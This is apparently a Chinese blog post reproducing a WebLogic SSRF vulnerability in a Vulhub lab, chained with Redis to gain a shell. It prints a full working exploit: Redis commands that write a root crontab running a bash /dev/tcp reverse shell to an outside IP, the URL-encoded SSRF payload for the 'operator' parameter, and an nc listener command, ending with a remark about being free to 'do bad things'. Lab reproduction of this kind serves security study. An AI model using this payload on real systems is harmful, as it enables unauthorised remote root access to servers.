前提回顾
Weblogic漏洞复现之弱口令
Weblogic漏洞复现之任意文件上传(CVE-2018-2894)
Weblogic简介
全称为Oracle WebLogic Server,是基于JavaEE服务器的中间件
基础环境
靶场:weblogic(vulhub)
工具:burp suite
所需知识
(这里只是大概提一下所需的知识,想深入了解的兄弟可以去搜索相关课程学习)
SSRF,又叫服务端请求伪造,是一种由攻击者构造形成由服务端发起的一个安全漏洞,
常见场景有:
1.社会化分享功能
2.转码服务
3.在线翻译
4.在线的图片下载
5.图片,文章收藏功能
6.网站采集,网站抓取
Redis(全称为Remote Dictionary Server)是一个开源的高性能键值对存储系统,具有快速、灵活和可扩展的特性。它是一个基于内存的数据结构存储系统,可以用作数据库、缓存和消息代理。
漏洞原理:在这次的靶场中存在一个SSRF漏洞,可以上传任何HTTP请求,我们可以利用这关漏洞,再结合Redis的反弹连接,从而进行攻击
复现过程
在配置好靶场后,我们在浏览器的导航栏中输入下列Url进入
http://xxx.xxx.xxx.xxx:7001/uddiexplorer/
j接着点击左侧"Search public registries",进入有ssrf漏洞的地方,接下来,我们需要获取到内网redis的端口,从而利用的SSRF漏洞去工具内网的redis服务,原理在下面这篇大佬的问章,同时大佬提供了获取内网端口的方法,这里由于是漏洞复现操作,该过程对复现过程不太重要,所以这里我就偷懒,从日志中获取内网ip
聊一聊ssrf漏洞的挖掘思路与技巧
内网ip获取方式(懒人版)
//获取容器信息
docker ps
//内网ip,只需要将得到的容器Id复制替换到对应位置即可
//容器id不用全复制,复制一部分即可
docker exec -it 容器ID ifconfig
获取内网ip后,我们就需要开始构造payload,去触发redis反弹连接,我们需要一个定时任务,
//这里需要另外一台机器的ip,用来当中间件
set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >&/dev/tcp/xxx.xxx.xxx.xxx/7777 0>&1' \n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
这里的内容就是每秒钟都在运行,通过将其注入到operator参数中,在Redis服务器上执行此命令。该命令的目的是在目标系统上执行一个反向Shell连接。
那么我们此时可以随便输入点内容,进行抓包
可以看到,我们要植入的地方是最下面operator字段,该字段的内容已经通过url编码了,那么我们也需要对我们的内容进行编码,这里可以去百度转换一下
//这里的第一关ip地址为得到的内网地址,第二关为中间件监听机的ip地址
//在Redis中,%0D%0A代表回车换行符,而大部分转换器只会幻化为%0A,因此需要手动添加%0D,此外,还需要在结尾添加%0D%0Aikun
//这部分是为了终止Redis命令并使其成功执行。"ikun"是一个无害字符串,可以随便更改,在该字符串之后的内容将被忽略,因此用于终止前面的命令。
operator=http://172.18.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.2.128%2F7777%200%3E%261'%20%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0Aikun
此时payload就构建完成了,那么我们这是需要用另外一台机器,来监听7777端口,在另外一条机器中输入:
nc -lvp 7777
此时再将BP中的opertor字段修改为我们的payload,发送,等待一段时间即可。
此时连接成功,可以愉快的干坏事了
1455
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
